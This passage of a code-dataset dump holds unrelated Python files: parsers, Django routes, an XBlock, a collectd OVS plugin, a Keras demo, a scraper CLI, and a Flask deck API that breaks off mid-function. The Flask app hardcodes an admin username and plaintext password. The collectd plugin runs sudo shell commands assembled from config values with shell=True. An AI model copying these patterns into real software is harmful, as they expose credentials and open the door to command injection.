so we got a service\n cls.extracted_service.append(each)\n elif len(each.split(\"/\")) == 2:\n # we found a '/', it would be port/proto\n if each.split(\"/\")[0].isdigit():\n # got a valid port, then check proto,\n # it would be too long if two if(s)\n # were mixed(?)\n if each.split(\"/\")[1] in [\n \"tcp\", \"udp\",\n \"ddp\", \"sctp\"]:\n cls.extracted_port.append(\n int(each.split(\"/\")[0]))\n cls.extracted_proto.append(\n cls.proto_to_int(each.split(\"/\")[1]))\n else:\n cls.logger.warning(\n \"Protocol %s is unknown\" %\n each.split(\"/\")[1])\n else:\n cls.logger.warning(\n \"Port number %s is unknown\" %\n each.split(\"/\")[0])\n break\n else:\n # too many '/', it would be a mistake\n cls.logger.warning(\n \"This line %s is malformed:\" %\n each)\n return cls.service_file\n\n @classmethod\n def proto_to_int(cls, each):\n if each == \"tcp\":\n return TP_PROTO_TCP\n if each == \"udp\":\n return TP_PROTO_UDP\n if each == \"ddp\":\n return PROTO_DDP\n if each == \"sctp\":\n return PROTO_SCTP\n else:\n cls.logger.warning(\n \"Protocol %s is unknown\" % each)\n\n @classmethod # deal with proto ddp & sctp\n def map_ddp_sctp_by_port(cls, port, proto): # find proto first, then port\n if proto in cls.extracted_proto: # because they overlaps some\n if proto == PROTO_DDP: # ports with TCP & UDP\n service_index = cls.extracted_proto.index(PROTO_DDP)\n else:\n service_index = cls.extracted_proto.index(PROTO_SCTP)\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, port))\n return None\n while service_index < len(cls.extracted_service):\n if cls.extracted_proto[service_index] == proto:\n if cls.extracted_port[service_index] == port:\n return Service(proto, port)\n else:\n service_index += 1\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, port))\n return None\n\n @classmethod\n def map_ddp_sctp_by_service(cls, service, proto): # deal with ddp & sctp\n if proto in cls.extracted_proto: # like the method above\n if proto == PROTO_DDP:\n service_index = cls.extracted_proto.index(PROTO_DDP)\n else:\n service_index = cls.extracted_proto.index(PROTO_SCTP)\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, service))\n return None\n while service_index < len(cls.extracted_service):\n if cls.extracted_proto[service_index] == proto:\n if cls.extracted_service[service_index] == service:\n port = cls.extracted_port[service_index]\n return Service(proto, port)\n else:\n service_index += 1\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, service))\n return None\n\n @classmethod\n def map_by_port(cls, port, proto): # find port first, then match proto\n if port in cls.extracted_port:\n service_index = cls.extracted_port.index(port)\n while service_index < len(cls.extracted_service):\n if cls.extracted_port[service_index] == port:\n if cls.extracted_proto[service_index] == proto:\n return Service(proto, port)\n else:\n service_index += 1\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, port))\n return None\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, port))\n return None\n\n @classmethod\n def map_by_service(cls, service, proto): # find service first,\n if service in cls.extracted_service: # then match proto\n service_index = cls.extracted_service.index(service)\n while service_index < len(cls.extracted_service):\n if cls.extracted_service[service_index] == service:\n if cls.extracted_proto[service_index] == proto:\n port = cls.extracted_port[service_index]\n return Service(proto, port)\n else:\n service_index += 1\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, service))\n return None\n else:\n cls.logger.warning(\n \"Combination %s/%s is not in the Service list\" %\n (proto, service))\n return None\n\n @classmethod\n def from_str(cls, s):\n if s is None:\n cls.logger.warning(\"Cannot parse None\")\n return None\n splitted = s.split(\"/\")\n if len(splitted) != 2:\n cls.logger.warning(\"Service definition [%s] is malformed\", s)\n return None\n proto = splitted[0].lower()\n proto = cls.proto_to_int(proto)\n port_or_service = splitted[1]\n if proto in [PROTO_DDP, PROTO_SCTP]:\n if port_or_service.isdigit():\n port = int(port_or_service)\n return cls.map_ddp_sctp_by_port(port, proto)\n else:\n service = str(port_or_service)\n return cls.map_ddp_sctp_by_service(service, proto)\n elif proto in [TP_PROTO_TCP, TP_PROTO_UDP]:\n if port_or_service.isdigit():\n port = int(port_or_service)\n return cls.map_by_port(port, proto)\n else:\n service = str(port_or_service)\n return cls.map_by_service(service, proto)\n else:\n cls.logger.warning(\"Service protocol [%s] is unknwon\", proto)\n return None\n\n def __init__(self, proto, port):\n self.proto = proto\n self.port = port\n\n def __eq__(self, other):\n return self.proto == other.proto and self.port == other.port\n\n def __hash__(self):\n return hash((self.proto, self.port))\n\n def __repr__(self):\n return \"\".format(self.proto, self.port)\n","sub_path":"flowsieve/acl/service_acl.py","file_name":"service_acl.py","file_ext":"py","file_size_in_byte":11766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"2391581","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.list_all, name='index'),\n url(r'^create', views.create_event, name='create'),\n url(r'^(?P[0-9]+)', views.view_event_details, name='detail'),\n url(r'^register/(?P[0-9]+)', views.register_user, name='register'),\n url(r'^adminlist/(?P[0-9]+)', views.view_admin_panel, name='adminlist'),\n url(r'^adminlist/paymentstatus/(?P[0-9]+)', views.change_payment_status, name='payment_status'),\n url(r'^delete/(?P[0-9]+)', views.delete_event, name='event_id'),\n url(r'^delete/', views.list_with_delete, name='delete'),\n\n]\n","sub_path":"chemie/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"384627385","text":"# -*- coding: utf-8 -*- \n\nfrom xblock.core import XBlock\nfrom xblock.fields import Scope, Dict, String\nfrom xblock.fragment import Fragment\nfrom .utils import render_template, load_resource,\\\n get_words_in_groups, convert_key_dict, compute_hash\n\n\nclass InputOverPicture(XBlock):\n \"\"\"\n Maintain mechanism to work with text and input key words over pictures.\n \"\"\"\n display_name = String(\n display_name = \"Title\",\n scope = Scope.settings,\n default = \"Task of input words over picture.\"\n )\n\n RU_CONDITION = String(\n default=\"17. Прочитайте текст и сделайте подписи к картинкам. Расставьте слова:\\\n 1) родственные отношения; 2) род занятий.\",\n scope = Scope.content\n )\n\n TU_CONDITION = String(\n default=\"Aşağıdaki parçayı okuyunuz ve resimlerin altına yazınız:\\\n 1. akrabalık ilişkileri.\\\n 2. meslek.\",\n scope = Scope.content\n )\n\n text = String(\n default='',\n scope=Scope.content,\n help='text with that users will be work'\n )\n\n first = Dict(\n default=None, \n scope=Scope.content,\n help=\"Exampe - picture_url|first_word|second_word,\\\n picture_url|first_word|second_word, and etc\"\n )\n\n second = Dict(\n default=None, \n scope=Scope.content,\n help=\"Exampe - picture_url|first_word|second_word,\\\n picture_url|first_word|second_word, and etc\"\n )\n\n third = Dict(\n default=None, \n scope=Scope.content,\n help=\"Exampe - picture_url|first_word|second_word,\\\n picture_url|first_word|second_word, and etc\"\n )\n\n fourth = Dict(\n default=None, \n scope=Scope.content,\n help=\"Exampe - picture_url|first_word|second_word,\\\n picture_url|first_word|second_word, and etc\"\n )\n\n\n def student_view(self, context=None):\n \"\"\"\n The primary view of the InputOverPicture, shown to students\n when viewing courses.\n \"\"\"\n context = {\n 'RU_CONDITION' : self.RU_CONDITION,\n 'TU_CONDITION' : self.TU_CONDITION,\n }\n \n data = [self.first, self.second, self.third, self.fourth]\n data = get_words_in_groups(data)\n\n if self.first:\n context['text'] = self.text\n context['first'] = data[2][0]\n context['second'] = data[2][1]\n context['third'] = data[2][2]\n context['fourth'] = data[2][3]\n context['words1'] = data[0]\n context['words2'] = data[1]\n\n html = render_template(\"static/html/input_over_picture.html\", context)\n frag = Fragment(html)\n frag.add_css(load_resource(\"static/css/input_over_picture.css\"))\n frag.add_javascript(load_resource(\"static/js/src/input_over_picture.js\"))\n frag.initialize_js('InputOverPicture')\n\n return frag\n\n\n def studio_view(self, context=None):\n \"\"\"\n Get template for editing.\n \"\"\"\n html = render_template(\"static/html/studio.html\")\n frag = Fragment(html)\n frag.add_javascript(load_resource(\"static/js/src/studio.js\"))\n frag.initialize_js('StudioEdit')\n\n return frag\n\n\n @XBlock.json_handler\n def set_data_from_studio(self, data, suffix=''):\n \"\"\"\n Called when submitting the form in Studio.\n \"\"\"\n self.text = data.get('text')\n self.first = convert_key_dict(data['first'])\n self.second = convert_key_dict(data['second'])\n self.third = convert_key_dict(data['third'])\n self.fourth = convert_key_dict(data['fourth'])\n\n return {'result': 'success'}\n\n\n @XBlock.json_handler\n def get_data_for_studio(self, data, suffix=''):\n return {\n 'text': self.text,\n 'first': self.first,\n 'second': self.second,\n 'third': self.third,\n 'fourth': self.fourth,\n }\n\n\n @XBlock.json_handler\n def check_word(self, data, suffix=''):\n \"\"\"\n Checking current input word on matching picture\n \"\"\"\n result = dict()\n array_d = [self.first, self.second, self.third, self.fourth]\n check_w = data['word']\n key = compute_hash(data['pic_src'])\n result['result'] = False\n\n index = data['wrap'].split('_')\n index = int(index[1])-1\n words = array_d[index][key]\n\n if check_w == words[0] or check_w == words[1]:\n result['result'] = True\n result['key'] = words[0] + '_' + words[1] + data['tag']\n\n return result","sub_path":"input_over_picture/input_over_picture/input_over_picture.py","file_name":"input_over_picture.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"594659054","text":"#!/usr/bin/env python\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"\n\"\"\"\n\nimport collectd\nimport os\nimport subprocess\nimport time\n\ndef configure(cfg):\n global INTERVAL\n global interfaces\n global namespaces\n interfaces = []\n namespaces = []\n config = {c.key: c.values for c in cfg.children}\n INTERVAL = config['interval'][0]\n collectd.register_read(read, INTERVAL)\n if 'interfaces' in config:\n interfaces = config['interfaces']\n if 'namespaces' in config :\n namespaces = config['namespaces']\n\ndef run_command(command):\n output = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE)\n return output.communicate()\n\ndef read(data=None):\n starttime = time.time()\n ifs = []\n ns = []\n if len(interfaces) > 0 :\n collectd.debug(\"Interfaces : {}\".format(interfaces))\n for interface in interfaces :\n ifs.append({interface: run_command(\"ovs-vsctl show | grep 'Port \\\\\\\"{}' | wc -l\".format(interface))[0].replace(\"\\n\",\"\")})\n if len(namespaces) > 0 :\n collectd.debug(\"Namespaces : {}\".format(namespaces))\n for namespace in namespaces :\n ns.append({namespace: run_command(\"sudo ip netns | grep {} | wc -l\".format(namespace))[0].replace(\"\\n\",\"\")})\n if len(ifs) > 0 :\n for i in ifs :\n for value in i:\n metric = collectd.Values()\n metric.plugin = 'ovsagent_monitoring'\n metric.interval = INTERVAL\n metric.type = 'gauge'\n metric.type_instance = \"{}_interface_total-count\".format(value)\n metric.values = [i[value]]\n metric.dispatch()\n\n if len(ns) > 0 :\n for n in ns :\n for value in n:\n metric = collectd.Values()\n metric.plugin = 'ovsagent_monitoring'\n metric.interval = INTERVAL\n metric.type = 'gauge'\n metric.type_instance = \"{}_ns_total-count\".format(value)\n metric.values = [n[value]]\n metric.dispatch()\n\n timediff = time.time() - starttime\n if timediff > INTERVAL:\n collectd.warning(\n 'ovsagent_monitoring: Took: {} > {}'.format(\n round(timediff, 2),\n INTERVAL)\n )\n\ncollectd.register_config(configure)\n","sub_path":"ansible/install/roles/collectd-openstack/files/collectd_ovsagent.py","file_name":"collectd_ovsagent.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"64128009","text":"import csv\r\nimport json\r\n\r\n\r\ndef get_data(filepath):\r\n datas = []\r\n with open(filepath) as f:\r\n csv_book = csv.reader(f)\r\n for row in list(csv_book)[1:-1]:\r\n if row[1] != '':\r\n datas.append(row)\r\n return datas\r\n\r\n\r\ndef write_json(filepath, data):\r\n with open(filepath,'a') as f:\r\n f.write('[')\r\n for i in range(len(data)):\r\n tmp_str = '{\\n\"spo_list\": {\\n\\t\"subject_type\": \"' + data[i][2] + '\",\\n\\t\"subject\": \"' + data[i][1] \\\r\n + '\",\\n\\t\"predicate\": \"' + data[i][5] + '\",\\n\\t\"object_type\": \"'+data[i][4] + '\",\\n\\t\"object\": \"' \\\r\n + data[i][3].replace('\"',\"'\") + '\"\\n}\\n},\\n'\r\n if i == len(data)-1:\r\n tmp_str=tmp_str[:-2]\r\n f.write(tmp_str)\r\n f.write(']')\r\n\r\nfilepath = 'D:\\\\ICE实验��\\\\sample(搜狐军事兵器解析).csv' # csv地址\r\njsonfile = 'D:\\\\ICE实验室\\\\tmpjson.json' # 生成的json地址\r\n# datas = get_data(filepath)\r\n# write_json(jsonfile, datas)\r\n\r\nwith open(jsonfile,'r') as f:\r\n data=json.load(f) # 加载为json保存\r\n entity_tmp_array = []\r\n entity_array=[]\r\n data_dict={}\r\n for row in data:\r\n tmp_dict={}\r\n entity_tmp_array.append(row['spo_list']['subject']) # 添加实体名\r\n tmp_dict['predicate'] = row['spo_list']['predicate']\r\n tmp_dict['object'] = row['spo_list']['object']\r\n data_dict[row['spo_list']['subject']]=tmp_dict\r\n entity_tmp_array=list(set(entity_tmp_array))\r\nprint(data)\r\n\r\n","sub_path":"demo/demo/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"400200011","text":"def div(n):\n ans = 0\n while n % 2 == 0:\n n /= 2\n ans += 1\n return ans\n\n\nn = int(input())\na = map(int, input().split())\nans = min(map(div, a))\nprint(ans)\n","sub_path":"python/abc081b.py","file_name":"abc081b.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"438587668","text":"'''\nA demo for running Keras inference on a database, and recording some results.\n'''\n\nimport numpy as np\nimport cv2 # Used to resize objects to the same size.\nimport tensorflow as tf\n\nfrom shuffler.utils import testing as testing_utils\nfrom shuffler.interface.keras import generators\n\n\ndef make_model(input_shape, num_classes):\n ''' Make a simple two-layer convolutional model. '''\n model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=input_shape),\n tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dropout(0.5),\n tf.keras.layers.Dense(num_classes, activation=\"softmax\"),\n ])\n model.summary()\n return model\n\n\ndef main():\n # This database contains 3 images with 2 cars and 1 bus.\n in_db_file = testing_utils.Test_carsDb.CARS_DB_PATH\n rootdir = testing_utils.Test_carsDb.CARS_DB_ROOTDIR\n\n # Objects are resized to this shape.\n width = 100\n height = 100\n\n # The transform resizes every image, and makes the label categorical.\n transform_group = {\n 'image': lambda x: cv2.resize(x, (width, height)),\n 'name': lambda x: 1 if x == 'bus' else 0\n }\n\n # Make a generator of OBJECTS. Every returned item is an object in the db.\n generator = generators.ObjectGenerator(in_db_file,\n rootdir=rootdir,\n used_keys=['image', 'name'],\n transform_group=transform_group,\n batch_size=2,\n shuffle=False)\n\n model = make_model(input_shape=(height, width, 3), num_classes=2)\n model.compile(loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=[\"accuracy\"])\n\n epochs = 10\n model.fit(generator, epochs=epochs, workers=1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"shuffler/interface/keras/generators_demo.py","file_name":"generators_demo.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"503373674","text":"#!/usr/bin/python\n\nimport hostGroups\n\n\nmask=\"\"\"\ndefine host {\n use generic-host\n name Ajour_%s\n host_name %s.ajoursystem.dk\n hostgroups ajour_web_systems, ajour_email_systems, %s\n check_command check_dummy\n}\n\"\"\"\n\n\ndef doAll():\n hosts = hostGroups.Hosts()\n hosts.buildHostsFromConsul() \n\n for host_key, host in hosts.hosts.items():\n for site in host.sites:\n\n #site='ai'\n #host='a8'\n exp = mask % (site.sitekey, site.sitekey, host.hostname)\n print(exp)\n\n\n\ndoAll()\n","sub_path":"hostlist_icinga/build_host_defs.py","file_name":"build_host_defs.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"161086828","text":"from couchdbkit import ResourceNotFound\nfrom couchdbkit.ext.django import schema\nimport datetime\nfrom dimagi.utils.parsing import json_format_date\nfrom pillowtop.listener import BasicPillow\n\n\ndef date_emitter(fn):\n fn._fluff_emitter = 'date'\n return fn\n\n\ndef null_emitter(fn):\n fn._fluff_emitter = 'null'\n return fn\n\n\ndef filter_by(fn):\n fn._fluff_filter = True\n return fn\n\n\nclass CalculatorMeta(type):\n _counter = 0\n\n def __new__(mcs, name, bases, attrs):\n emitters = set()\n filters = set()\n parents = [p for p in bases if isinstance(p, CalculatorMeta)]\n for attr in attrs:\n if getattr(attrs[attr], '_fluff_emitter', None):\n emitters.add(attr)\n if getattr(attrs[attr], '_fluff_filter', False):\n filters.add(attr)\n\n # needs to inherit emitters and filters from all parents\n for parent in parents:\n emitters.update(parent._fluff_emitters)\n filters.update(parent._fluff_filters)\n\n cls = super(CalculatorMeta, mcs).__new__(mcs, name, bases, attrs)\n cls._fluff_emitters = emitters\n cls._fluff_filters = filters\n cls._counter = mcs._counter\n mcs._counter += 1\n return cls\n\n\nclass Calculator(object):\n __metaclass__ = CalculatorMeta\n\n window = None\n\n def __init__(self, window=None):\n if window is not None:\n self.window = window\n if not isinstance(self.window, datetime.timedelta):\n # if window is set to None, for instance\n # fail here and not whenever that's run into below\n raise NotImplementedError(\n 'window must be timedelta, not %s' % type(self.window))\n\n def filter(self, item):\n return True\n\n def to_python(self, value):\n return value\n\n def calculate(self, item):\n passes_filter = self.filter(item) and all(\n (getattr(self, slug)(item) for slug in self._fluff_filters)\n )\n values = {}\n for slug in self._fluff_emitters:\n values[slug] = (\n list(getattr(self, slug)(item))\n if passes_filter else []\n )\n return values\n\n\n\nclass IndicatorDocumentMeta(schema.DocumentMeta):\n\n def __new__(mcs, name, bases, attrs):\n calculators = {}\n for attr_name, attr_value in attrs.items():\n if isinstance(attr_value, Calculator):\n calculators[attr_name] = attr_value\n attrs[attr_name] = schema.DictProperty()\n cls = super(IndicatorDocumentMeta, mcs).__new__(mcs, name, bases, attrs)\n if not hasattr(cls, '_calculators'):\n cls._calculators = {}\n cls._calculators.update(calculators)\n return cls\n\n\nclass IndicatorDocument(schema.Document):\n\n __metaclass__ = IndicatorDocumentMeta\n base_doc = 'IndicatorDocument'\n\n document_class = None\n group_by = ()\n\n def calculate(self, item):\n for attr, calculator in self._calculators.items():\n self[attr] = calculator.calculate(item)\n self.id = item.get_id\n for attr in self.group_by:\n self[attr] = item[attr]\n # overwrite whatever's in group_by with the default\n self['group_by'] = type(self)().group_by\n\n @classmethod\n def pillow(cls):\n doc_type = cls.document_class._doc_type\n domains = ' '.join(cls.domains)\n return type(FluffPillow)(cls.__name__ + 'Pillow', (FluffPillow,), {\n 'couch_filter': 'fluff/domain_type',\n 'extra_args': {\n 'domains': domains,\n 'doc_type': doc_type\n },\n 'document_class': cls.document_class,\n 'indicator_class': cls,\n })\n\n @classmethod\n def get_result(cls, calc_name, key, reduce=True):\n calculator = cls._calculators[calc_name]\n result = {}\n for emitter_name in calculator._fluff_emitters:\n shared_key = [cls._doc_type] + key + [calc_name, emitter_name]\n emitter_type = getattr(calculator, emitter_name)._fluff_emitter\n q_args = {\n 'reduce': reduce,\n 'include_docs': not reduce,\n }\n if emitter_type == 'date':\n now = datetime.datetime.utcnow().date()\n start = now - calculator.window\n end = now\n q = cls.view(\n 'fluff/generic',\n startkey=shared_key + [json_format_date(start)],\n endkey=shared_key + [json_format_date(end)],\n **q_args\n ).all()\n elif emitter_type == 'null':\n q = cls.view(\n 'fluff/generic',\n key=shared_key + [None],\n **q_args\n ).all()\n if reduce:\n try:\n result[emitter_name] = q[0]['value']\n except IndexError:\n result[emitter_name] = 0\n else:\n result[emitter_name] = q\n return result\n\n class Meta:\n app_label = 'fluff'\n\n\nclass FluffPillow(BasicPillow):\n indicator_class = IndicatorDocument\n\n def change_transform(self, doc_dict):\n doc = self.document_class.wrap(doc_dict)\n indicator_id = '%s-%s' % (self.indicator_class.__name__, doc.get_id)\n\n try:\n indicator = self.indicator_class.get(indicator_id)\n except ResourceNotFound:\n indicator = self.indicator_class(_id=indicator_id)\n indicator.calculate(doc)\n return indicator\n\n def change_transport(self, indicator):\n indicator.save()\n","sub_path":"fluff/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"86258343","text":"from cmd import Cmd\n\nfrom webscraper.model.graphcreator import GraphCreator\nfrom webscraper.model.webdata import WebData\nfrom webscraper.model.webobject import DataHandler\nfrom webscraper.model.webobject import WebObjectFactory\nfrom webscraper.model.webrequest import *\nfrom webscraper.view.consoleview import *\n\n\nclass Command(Cmd):\n\n def __init__(self):\n Cmd.__init__(self)\n self.view = ConsoleView()\n self.web_request = WebRequest()\n self.web_object_factory = WebObjectFactory()\n self.data_handler = DataHandler()\n self.web_data = WebData(self.web_request, self.web_object_factory,\n self.data_handler)\n self.graph_creator = GraphCreator(self.web_data)\n\n def do_request(self, args):\n \"\"\"\n\n ----------------------------------------------------------------------\n\n -- request --\n -- Use the request command to handle fetching of website data\n\n ----------------------------------------------------------------------\n\n -- OPTIONS --\n u -- sets primary url for fetch request\n example: request u--'url_here'\n f -- fetches data from primary url\n example: request f\n up -- sets url padding (if required)\n example: request up--'url_padding'\n ur -- add recursive url (usually done from data)\n example: request ur--'url'\n rf -- fetches data from all recursive urls\n example: request rf\n p -- prints data related to requests\n example: request p--'p_option'\n\n -- p OPTIONS --\n url -- prints primary url\n example: request p--url\n urlpadd -- prints recursive url padding\n example: request p--urlpadd\n recurls -- prints recursive urls\n example: request p--recurls\n reqdata -- prints primary request data\n example: request p--reqdata\n recdata -- prints recursive request data\n example: request p--recdata\n recdatacount -- prints recursive data count\n example: request p--recdatacount\n\n ----------------------------------------------------------------------\n\n \"\"\"\n result = self.web_request.handle_command(self.split_args(args))\n if result is not None:\n self.default(result)\n\n def do_data(self, args):\n \"\"\"\n\n ----------------------------------------------------------------------\n\n -- data --\n -- Use the data command to filter and manipulate website data\n\n ----------------------------------------------------------------------\n\n -- OPTIONS --\n l -- load saved web objects\n example: data l--'file_name'\n s -- save filtered web objects\n example: data s--'file_name'\n g -- get request data by tag, class/id, name\n example: data g--'tag':'class/id':'name'\n gr -- get recursive request data by tag, class/id, name\n example: data gr--'tag':'class/id':'name'\n cf -- clear all currently filtered data\n example: data cf\n fu -- filter urls from request data adding\n example: data fu--'tag':'class/id':'name'\n them to recursive urls\n dk -- set keywords to filter filtered data\n example: data dk--'tag':'class/id':'name'\n rdk -- set keywords to filter recursive filtered data\n example: data rdk--'tag':'class/id':'name'\n cd -- consolidate all filtered data\n example: data cd--'cd_option':'cd_option'\n\n -- cd OPTIONS --\n kw -- filters data by keywords\n example: data cd--kw:0:0|kw:0:0\n child -- filters data by children\n example: data cd--kw:0:0|child:0:0\n\n wo -- display all created web objects\n example: data wo\n p -- prints data related to filtered data\n example: data p--'p_option'\n\n -- p OPTIONS --\n fdata -- prints filtered data\n example: data p--fdata\n rdata -- prints filtered recursive data\n example: data p--rdata\n fdkeywords -- prints filtered data keywords\n example: data p--fdkeywords\n rfdkeywords -- prints recursive filtered data keywords\n example: data p--rfdkeywords\n\n ----------------------------------------------------------------------\n\n \"\"\"\n result = self.web_data.handle_command(self.split_args(args))\n if result is not None:\n self.default(result)\n\n def do_graph(self, args):\n \"\"\"\n\n ----------------------------------------------------------------------\n\n -- graph --\n -- Use the graph command to display filtered data in a graphical format\n\n ----------------------------------------------------------------------\n\n -- OPTIONS --\n g -- displays graph -- takes one parameter 'graph_title'\n example: graph g--'graph_title_here'\n d -- sets graph data -- takes one parameter\n example: graph d--'attribute_name_here'\n gd -- displays currently set graph data -- takes no parameters\n example: graph gd\n\n ----------------------------------------------------------------------\n\n \"\"\"\n result = self.graph_creator.handle_command(self.split_args(args))\n if result is not None:\n self.default(result)\n\n def split_args(self, args):\n if args is None:\n return None\n else:\n return args.split()\n","sub_path":"webscraper/cli/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"563530544","text":"from Tkinter import *\nfrom os import name, sep\n\nclass PencereGoster(Tk):\n def __init__(self, baslik, icerik):\n Tk.__init__(self)\n #self.geometry(\"300x50\")\n self.geometry(\"300x100\")\n self.baslik = baslik\n\n self.resizable(0, 0)\n if name == \"nt\":\n self.iconbitmap(\"kaynaklar\"+sep+\"camii.ico\")\n elif name == \"posix\":\n self.iconbitmap(\"@kaynaklar\"+sep+\"camii.xbm\")\n \n self.title(baslik)\n etk = Label(self, text=icerik)\n etk.pack(expand=True)\n dug = Button(self, text=\"Tamam\", command=lambda:self.destroy())\n dug.pack(side=\"bottom\", expand=True)\n self.ortala(self)\n \n \n def ortala(self, penc):\n penc.update_idletasks()\n gen= penc.winfo_width()\n yuk = penc.winfo_height()\n \n e_gen = penc.winfo_screenwidth()\n e_yuk = penc.winfo_screenheight()\n \n x = (e_gen / 2) - (gen / 2)\n y = (e_yuk / 2) - (yuk / 2)\n \n penc.geometry(\"{}x{}+{}+{}\".format(gen, yuk, x, y))\n\ndef baslat():\n pencere = PencereGoster(\"Pencere\",\"Deneme Penceresi\")\n mainloop()\n\nif __name__ == \"__main__\":\n baslat()\n ","sub_path":"kaynak/PencereGoster.py","file_name":"PencereGoster.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"60632656","text":"from flask import Flask, request, session, g, redirect, url_for, abort, make_response, current_app, \\\n render_template, flash\nfrom pymongo import MongoClient\nfrom bson import BSON\nfrom bson import json_util\nfrom bson.objectid import ObjectId\nimport logging, sys\nfrom datetime import timedelta\nfrom functools import update_wrapper\nimport datetime\nlogging.basicConfig(stream=sys.stderr)\napp = Flask(__name__)\n\ndef crossdomain(origin=None, methods=None, headers=None,\n max_age=21600, attach_to_all=True,\n automatic_options=True):\n if methods is not None:\n methods = ', '.join(sorted(x.upper() for x in methods))\n if headers is not None and not isinstance(headers, basestring):\n headers = ', '.join(x.upper() for x in headers)\n if not isinstance(origin, basestring):\n origin = ', '.join(origin)\n if isinstance(max_age, timedelta):\n max_age = max_age.total_seconds()\n\n def get_methods():\n if methods is not None:\n return methods\n\n options_resp = current_app.make_default_options_response()\n return options_resp.headers['allow']\n\n def decorator(f):\n def wrapped_function(*args, **kwargs):\n if automatic_options and request.method == 'OPTIONS':\n resp = current_app.make_default_options_response()\n else:\n resp = make_response(f(*args, **kwargs))\n if not attach_to_all and request.method != 'OPTIONS':\n return resp\n\n h = resp.headers\n\n h['Access-Control-Allow-Origin'] = origin\n h['Access-Control-Allow-Credentials'] = 'true'\n h['Access-Control-Allow-Methods'] = get_methods()\n h['Access-Control-Max-Age'] = str(max_age)\n h['Access-Control-Allow-Headers'] = '*, X-Requested-With, x-requested-with, Content-Type, If-Modified-Since, If-None-Match'\n # if headers is not None:\n # h['Access-Control-Allow-Headers'] = headers\n return resp\n\n f.provide_automatic_options = False\n return update_wrapper(wrapped_function, f)\n return decorator\n\n\n@app.route(\"/\")\n@crossdomain(origin='http://localhost')\ndef hello():\n\tsession['test'] = True\n\treturn \"hi\"\n\n\n@app.route('/admin/login', methods=['POST', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef adminLogin():\n # return json_util.dumps({'test': True})\n data = request.get_json()\n email = data['email']\n password = data['password']\n\n ret = { 'success' : False }\n\n if email == 'lakk' and password == 'lakin925':\n session[\"admin\"] = True\n ret['success'] = True\n\n return json_util.dumps(ret)\n\n\n@app.route('/deck/', methods=['GET', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef deck(deck_id):\n # session[\"mod_id\"]\n # return json_util.dumps(session)\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n deck = db.decks.find_one({\"_id\" : ObjectId(deck_id)})\n del deck['mod']\n deck['_id'] = str(deck['_id'])\n # ret = { 'loggedIn' : ('mod_email' in session) }\n return json_util.dumps({\"success\" : True, \"deck\": deck })\n\n@app.route('/mods/decks', methods=['GET', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef modDecks():\n # session[\"mod_id\"]\n # return json_util.dumps(session)\n client = MongoClient(\"localhost\")\n db = client.hearthgg\n decks = db.decks.find({\"mod\" : ObjectId(session[\"mod_id\"])})\n deckInfo = map(lambda d: {\"_id\" : str(d[\"_id\"]), \"player\" : d[\"player\"], \"class\" : d[\"class\"], \"date\" : d['date']}, decks)\n\n # ret = { 'loggedIn' : ('mod_email' in session) }\n return json_util.dumps({\"success\" : True, \"decks\": deckInfo })\n\n@app.route('/mods/status', methods=['GET', 'OPTIONS'])\n@crossdomain(origin='http://localhost')\ndef modStatus():\n\t# ret 